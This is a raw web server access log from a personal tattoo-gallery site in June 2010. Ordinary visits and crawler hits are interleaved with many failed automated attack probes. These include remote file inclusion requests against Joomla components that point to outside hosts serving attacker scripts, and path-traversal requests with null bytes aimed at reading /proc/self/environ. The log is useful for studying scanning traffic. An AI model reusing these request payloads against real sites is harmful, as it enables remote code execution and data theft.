93.186.192.124 - - [28/Jun/2010:06:52:03 -0500] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:52:03 -0500] "GET /logs/access_log.1275868800%20%20///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:52:03 -0500] "GET ///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:52:03 -0500] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:52:03 -0500] "GET /logs/access_log.1275868800%20%20///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:52:20 -0500] "GET /logs/access_log.1275609600%20%20///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:52:25 -0500] "GET /logs/access_log.1275609600%20%20///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:52:27 -0500] "GET /logs/access_log.1275609600%20%20///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.195.112.180 - - [28/Jun/2010:06:53:59 -0500] "GET /logs/access_log.1163808000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.134 - - [28/Jun/2010:06:57:10 -0500] "GET /logs/access_log.1243123200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [28/Jun/2010:07:08:07 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.14 - - [28/Jun/2010:07:13:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.204.14 - - [28/Jun/2010:07:13:11 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
67.205.67.73 - - [28/Jun/2010:07:16:06 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 298 "-""Mozilla/3.0 (OS/2; U)"
67.205.67.73 - - [28/Jun/2010:07:16:11 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 293 "-""Mozilla/3.0 (OS/2; U)"
218.145.71.241 - - [28/Jun/2010:07:16:52 -0500] "GET /logs/access_log.1277164800/http://alexvanzetti.com//administrator/components/com_virtuemart/export.php=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 449 "-""libwww-perl/5.805"
218.145.71.241 - - [28/Jun/2010:07:16:53 -0500] "GET /http://alexvanzetti.com//administrator/components/com_virtuemart/export.php=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 422 "-""libwww-perl/5.805"
218.145.71.241 - - [28/Jun/2010:07:16:54 -0500] "GET /logs/http://alexvanzetti.com//administrator/components/com_virtuemart/export.php=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 427 "-""libwww-perl/5.805"
218.145.71.241 - - [28/Jun/2010:07:17:04 -0500] "GET /logs/access_log.1277164800/http://alexvanzetti.com//administrator/components/com_virtuemart/export.php=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 449 "-""libwww-perl/5.805"
218.145.71.241 - - [28/Jun/2010:07:17:05 -0500] "GET /http://alexvanzetti.com//administrator/components/com_virtuemart/export.php=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 422 "-""libwww-perl/5.805"
218.145.71.241 - - [28/Jun/2010:07:17:05 -0500] "GET /logs/http://alexvanzetti.com//administrator/components/com_virtuemart/export.php=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 427 "-""libwww-perl/5.805"
207.46.199.177 - - [28/Jun/2010:07:19:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.120.246.20 - - [28/Jun/2010:07:23:49 -0500] "GET /logs/access_log.1276128000/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
203.120.246.20 - - [28/Jun/2010:07:23:50 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
203.120.246.20 - - [28/Jun/2010:07:23:51 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
203.120.246.20 - - [28/Jun/2010:07:24:32 -0500] "GET /logs/access_log.1276473600/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
207.46.195.229 - - [28/Jun/2010:07:24:40 -0500] "GET /logs/access_log.1201737600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
95.224.159.233 - - [28/Jun/2010:07:29:33 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.it/url?sa=t&source=web&cd=10&ved=0CEoQFjAJ&url=http%3A%2F%2Ftomdolan.pconline.com%2Ftattoo%2Ftattoo1.htm&rct=j&q=vintage+tatoo&ei=vZQoTJntH5WTsQbV6Z3EBA&usg=AFQjCNHjrXnOYOTb8B7m3-3jlFkAbM0Ulw""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:33 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:36 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:39 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:39 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:39 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:39 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:39 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:39 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:39 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:39 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:40 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:41 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:41 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:42 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
216.180.240.110 - - [28/Jun/2010:07:29:42 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:29:42 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
66.191.139.210 - - [28/Jun/2010:07:29:44 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:07:29:47 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
95.224.159.233 - - [28/Jun/2010:07:29:59 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:59 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:59 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:59 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:59 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:59 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:59 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:59 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:59 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:59 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:29:59 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:13 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:13 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:13 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:13 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:13 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:13 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:13 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:13 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:13 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:13 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:13 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
216.180.240.110 - - [28/Jun/2010:07:30:25 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:30:25 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
95.224.159.233 - - [28/Jun/2010:07:30:26 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:26 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:26 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:26 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:26 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:26 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:26 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:26 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:26 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:26 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:26 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
66.191.139.210 - - [28/Jun/2010:07:30:27 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:07:30:38 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
67.15.152.183 - - [28/Jun/2010:07:30:39 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.65"
95.224.159.233 - - [28/Jun/2010:07:30:43 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:43 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:43 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.224.159.233 - - [28/Jun/2010:07:30:43 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
216.180.240.110 - - [28/Jun/2010:07:33:58 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
67.15.152.183 - - [28/Jun/2010:07:34:00 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.65"
217.27.252.169 - - [28/Jun/2010:07:34:06 -0500] "GET /logs/access_log.1229817600 HTTP/1.1" 404 310 "-"": Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
216.180.240.110 - - [28/Jun/2010:07:34:12 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
66.191.139.210 - - [28/Jun/2010:07:34:16 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:07:34:53 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:07:34:59 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
67.15.152.183 - - [28/Jun/2010:07:35:02 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.65"
216.180.240.110 - - [28/Jun/2010:07:35:07 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:35:12 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
66.191.139.210 - - [28/Jun/2010:07:35:42 -0500] "GET /logs/access_log.1274572800//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:07:35:42 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:07:35:42 -0500] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
216.180.240.110 - - [28/Jun/2010:07:35:48 -0500] "GET /logs/access_log.1274832000//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:35:48 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:35:48 -0500] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:36:15 -0500] "GET /logs/access_log.1274572800//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
67.15.152.183 - - [28/Jun/2010:07:36:42 -0500] "GET /logs/access_log.1274832000//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.65"
67.15.152.183 - - [28/Jun/2010:07:36:42 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.65"
67.15.152.183 - - [28/Jun/2010:07:36:42 -0500] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
216.180.240.110 - - [28/Jun/2010:07:36:43 -0500] "GET /logs/access_log.1274832000//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:36:43 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:36:43 -0500] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:36:51 -0500] "GET /logs/access_log.1274572800//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:36:51 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:36:51 -0500] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:36:56 -0500] "GET /logs/access_log.1274572800//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:36:56 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:36:56 -0500] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
67.15.152.183 - - [28/Jun/2010:07:37:09 -0500] "GET /logs/access_log.1274572800//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.65"
67.15.152.183 - - [28/Jun/2010:07:37:09 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.65"
67.15.152.183 - - [28/Jun/2010:07:37:09 -0500] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
216.180.240.110 - - [28/Jun/2010:07:37:09 -0500] "GET /logs/access_log.1274572800//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
67.15.152.183 - - [28/Jun/2010:07:37:13 -0500] "GET /logs/access_log.1274572800//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.65"
216.180.240.110 - - [28/Jun/2010:07:37:25 -0500] "GET /logs/access_log.1274832000//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:37:25 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
